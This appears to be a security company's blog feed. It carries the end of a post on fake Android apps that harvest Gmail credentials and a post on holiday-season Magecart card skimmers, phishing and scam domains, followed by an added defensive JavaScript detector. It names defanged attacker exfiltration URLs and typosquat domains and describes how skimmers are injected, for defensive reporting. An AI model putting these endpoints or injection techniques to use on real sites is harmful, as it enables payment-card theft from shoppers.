Based on the game names, the developer(s) seem to be targeting Indian users. Fauji is a battle royale game that is supposed to launch in India as an alternative to PUBG. Another app is named Betok Indian Short Videos, with an icon similar to TikTok's. Fdnmg appears to be in the very early stages of development. Looking at the package name, the developer seems to be positioning this app as a fake PUBG-related app, as shown in Figure 9.

Figure 9: This fake app appears to be in the very early development stage.

Again, this app is no different than the other fake apps. It flashes videos and soon asks for a Gmail ID and password, while bombarding the victim with ads.

Figure 10: As with the other fake apps, the videos are stored in the Registry directory.

Similar to the other fake apps, this app does not send the Gmail credentials anywhere. But this functionality is likely under development, and the next update might actually steal the credentials. We have reported these apps, and Google's Android security team promptly removed them from the Google Play store.

Conclusion
Despite Google's diligent efforts, miscreants still manage to slip potentially unwanted apps (PUAs) onto Google's official Android store, Google Play.
While Google tries its best to protect Android users worldwide, it is also the responsibility of Android users to be vigilant when installing apps. We advise users to download and install Android apps from official stores, such as Google Play. But there can be scenarios where PUAs enter official stores. To help avoid downloading PUAs:
- Be sure to read user reviews before installing any app.
- Do not simply allow any random permissions that an app may demand. For example, it makes no sense for a calculator app to ask for the "READ_SMS" permission.
- Always disable the "Unknown Sources" option so that a random app cannot further install apps from third-party sources.
- If an app does not act as described, immediately uninstall it and report the app to Google.

Fri, 04 Dec 2020 07:58:49 -0800 Shivang Desai

Cyber Monday: Shopping Scams and Skimmers
With Black Friday and Cyber Monday, the biggest shopping days of the year, just behind us, Zscaler has noticed that attackers have taken advantage of this holiday activity for their targeted cybercrimes. This year has been unprecedented, especially with everyone staying home because of COVID-19 and engaging in more online shopping than ever seen previously. The Zscaler cloud processes, on average, around 130 billion customer transactions daily, which gives us insight into activity trends happening across the internet. Since the beginning of this month, we have noticed an increase in online shopping activity leading up to the holidays. As expected, we noticed a significant uptick in this activity on Cyber Monday (11/30).

Figure 1: Shopping transactions on the Zscaler cloud seen increasing from 750 million to 1.13 billion since the first week of this month.
Skimmer Activity

Cyber Monday and Black Friday have always been a target for cybercriminals in many different ways, including phishing, scams, and compromising e-commerce websites to inject malicious card skimmers that steal payment card information. Card skimmer groups remain active throughout the year, and during the holidays a spike in such attacks is the norm. ThreatLabz researchers have monitored this sudden spike in cyberattacks during the weeks leading up to Cyber Monday in previous years as well. In this section, we will discuss some of the card skimmer attacks that our team has seen in the wild.

1. While monitoring attacks related to Cyber Monday and Black Friday, the ThreatLabz team came across an online footwear store that was offering discounts for Cyber Monday and was infected with a card skimmer.

Figure 2: E-commerce store offering a Cyber Monday sale.

Figure 3: Injected obfuscated skimmer script.

The domain jblackfriday2017[.]com was registered in 2017 and has been active ever since, offering discounts for Cyber Monday. This e-commerce website is hosted on 139.60.163[.]88, which hosts multiple similar footwear e-commerce websites, all of which are infected with the same skimmer script. All of these footwear online stores are offering different types of sales and discounts. These e-commerce websites are running outdated Magento software; they were compromised a few months ago and are still seen serving the skimmer script. In all of these e-commerce websites, the skimmer script is appended to the same JavaScript file, i.e. <Domain>/js/varien/form.js, and the collected data is sent back to the attacker-controlled IP address 103.139.113[.]34.

Data exfiltration URL: 103.139.113[.]34/check_error.php?discounts=

Following are other similar footwear e-commerce websites that use the same theme and are infected with the skimmer discussed above.

2. Skimmer groups most of the time use newly registered domains, lexically close to a web service or web analytics service, in order to remain undetected for long and infect multiple e-commerce websites. ThreatLabz researchers have recently seen such newly registered domains used by skimmer groups to infect e-commerce stores offering Cyber Monday and Black Friday sales; one such case is discussed below.

Figure 4: E-commerce website offering a Black Friday sale.

The skimmer script injected into the e-commerce website is hosted on a newly registered domain and is highlighted below.

Figure 5: Obfuscated malicious script injected into the e-commerce store.

Skimmer domain: googleplus[.]name
Creation date: 2020-11-03

The skimmer script contains a base64-encoded fake payment form, which is injected as an iframe at checkout, and the payment card details are sent to the attacker-controlled server.

Data exfiltration URL: hxxps://googleplus[.]name/google.php

Figure 6: Base64-encoded fake payment form.

3. Skimmer groups generally use a newly registered domain to infect multiple e-commerce websites, but this is not always the case: we have seen a few Magecart groups that target specific e-commerce websites register a malicious domain lexically close to the target website. "Giantmicrobes", a toy company that offers many healthcare-related goods, has been a victim of this attack as well. Below is a screenshot of the source code from the Giantmicrobes website. The screenshot shows a highlighted reference to an external JavaScript file; the domain looks legitimate, but a closer look reveals that it is only lexically close to the legitimate domain.

Figure 7: Skimmer script injected into the legitimate e-commerce website.

Legitimate domain: giantmicrobes[.]com
Skimmer domain: giantnicrobes[.]com
Creation date: 2020-10-28
Registrar: NAMECHEAP INC

The JavaScript injected from the malicious domain is obfuscated, and the exfiltration URL is shown below.
Figure 8: Deobfuscated malicious skimmer script.

We analyzed more variants of this skimmer script and detected more such targeted attacks. The Cheesecake Shop ([.]au), an online bakery store, was hit by a similar targeted skimmer last month but was cleaned up later on.

Legitimate domain: cheesecake[.]com[.]au
Skimmer domain: cneesecaka[.]com
Creation date: 2020-10-20
Registrar: 1API GmbH

The malicious domain cneesecaka[.]com was later used to target multiple other e-commerce websites related to automobile parts, electronics, and others.

4. Data exfiltration is also sometimes done via newly registered domains, and the API services of popular platforms such as Google Analytics and Telegram have been seen being used by attackers for data exfiltration. In a few different variants of the skimmer discussed above, we have observed that the stolen data from one compromised Magento site is sent to another compromised Magento site.

Figure 9: Malicious skimmer script injected on the Magento platform.

Following is the deobfuscated script with the gate URL of another e-commerce website.

Figure 10: Deobfuscated malicious skimmer script.

Figure 11: Data exfiltration to another compromised Magento website.

Phishing

As we have seen over previous years, attackers use Black Friday-themed domains for phishing user credentials. One such domain we came across is "blackfriday2020[.]pro", hosting a login page. The same login page was previously seen on multiple sites, according to urlscan.

Figure 12: Multiple sites hosting the same login page.

Black Friday offers are also huge all over the world. Jumia[.]com[.]ng is an online marketplace based in Nigeria. The image below shows a phishing site (jumia-blackfridayoffers[.]com) claiming to offer Black Friday deals. Notice the absence of a valid certificate. The legitimate vendor domain is registered to "Ecart Internet Services Nigeria Limited".

Figure 13: Phishing page mimicking the Jumia marketplace.
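As an added example (not code from the Zscaler post), here are two defender-side checks a site owner could run over their own checkout HTML, based on the skimmer tradecraft in items 2 and 3 above: flagging external script hosts whose registrable label is within edit distance 1 or 2 of the site's own (the giantmicrobes/giantnicrobes and cheesecake/cneesecaka pairs), and decoding long base64 literals in script text to see whether they hide a card-entry form. The suffix list, the distance threshold and the regexes are assumptions for this demo, not a full public-suffix or skimmer signature set.

```javascript
// Added example (not code from the Zscaler post). Two checks a site owner can run
// over their own checkout page: external script hosts lexically close to the
// site's own label (giantmicrobes -> giantnicrobes), and base64 literals in script
// text that decode to a payment form of the kind skimmers inject as an iframe.

// Levenshtein edit distance between two strings.
function editDistance(a, b) {
  const d = Array.from({ length: a.length + 1 }, (_, i) => [i]);
  for (let j = 1; j <= b.length; j++) d[0][j] = j;
  for (let i = 1; i <= a.length; i++) {
    for (let j = 1; j <= b.length; j++) {
      const sub = d[i - 1][j - 1] + (a[i - 1] === b[j - 1] ? 0 : 1);
      d[i][j] = Math.min(d[i - 1][j] + 1, d[i][j - 1] + 1, sub);
    }
  }
  return d[a.length][b.length];
}

// Registrable label of a host ("cheesecake" for "cheesecake.com.au"). Assumption:
// this short suffix list stands in for a full public-suffix list.
const MULTI_SUFFIX = ["com.au", "co.uk", "com.ng"];
function sldLabel(host) {
  const parts = host.toLowerCase().split(":")[0].split(".");
  const n = MULTI_SUFFIX.includes(parts.slice(-2).join(".")) ? 3 : 2;
  return parts.slice(-n)[0];
}

// External script hosts whose label is a near-copy (edit distance 1 or 2) of the
// site's own label; the site's own subdomains (distance 0) are not flagged.
function lookalikeScriptHosts(html, siteHost) {
  const own = sldLabel(siteHost), hits = [];
  for (const m of html.matchAll(/<script[^>]+src=["']https?:\/\/([^/"']+)/gi)) {
    const dist = editDistance(own, sldLabel(m[1]));
    if (dist > 0 && dist <= 2) hits.push(m[1]);
  }
  return hits;
}

// Decode long base64 string literals in script text and return those that look
// like a card-entry form (the fake checkout form described for googleplus[.]name).
function base64PaymentForms(script) {
  const found = [];
  for (const m of script.matchAll(/["']([A-Za-z0-9+/]{40,}={0,2})["']/g)) {
    const text = Buffer.from(m[1], "base64").toString("utf8");
    if (/<(form|iframe)/i.test(text) && /card|cvv|cvc|expir/i.test(text)) found.push(text);
  }
  return found;
}
```

Run it against a saved copy of the checkout page and its inline scripts; a hit from either function is a reason to diff the page against the deployed source, since the skimmers above were appended to a legitimate file or loaded from a lookalike host.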
Targeting Sport Fans

Fans of various sports and their teams should be cautious when purchasing their favorite team or player jersey online. We have noticed multiple domains recently registered specifically for scamming sports fans of MLB, NCAA, NHL, NBA, NFL, and more. A snapshot of some of these domains can be seen below.

Figure 14: Newly registered domains related to sports jerseys.

Conclusion

The Zscaler ThreatLabZ team actively tracks campaigns targeting online shoppers and provides coverage to ensure that our customers are protected from these kinds of attacks. Even though Black Friday and Cyber Monday are behind us, most of the holiday sales continue until the end of this week (Cyber Week). Users actively engaging in online shopping should be cautious and follow basic safety guidelines to protect their information and money while purchasing anything online:

- Verify the authenticity of the URL or website before opening it. Be wary of links with typos.
- Ensure that the online retailers and banking sites you are shopping from are using HTTPS/secure connections.
- Enable two-factor authentication, or "2FA," to provide an additional layer of security, especially for sensitive accounts related to financial transactions.
- As a rule of thumb, don't click links or open documents from unknown parties who promise exciting offers and opportunities.
- Avoid visiting URL shortener links.
- Always ensure that your operating system and web browser are up to date and have the latest security patches installed.
- Use a browser add-on, such as Adblock Plus, to block malvertising (compromised/malicious websites bombard visitors with pop-up ads).
- Only download apps from official app stores, such as Google or Apple.
- Avoid using public or unsecured Wi-Fi connections for shopping.
- Back up your documents and media files. You can always go the extra mile by encrypting your files.
- Review helpful instructions by the Federal Trade Commission (FTC) on Identity Theft, Recognizing and Avoiding Phishing Scams, and Understanding Mobile Apps and Malware.
- Review the National Cybersecurity and Communications Integration Center's (NCCIC) Holiday Scams and Malware Campaigns warning and recovery actions message.
- Report any incidents to the FTC.

Wed, 02 Dec 2020 15:46:33 -0800 Prakhar Shrotriya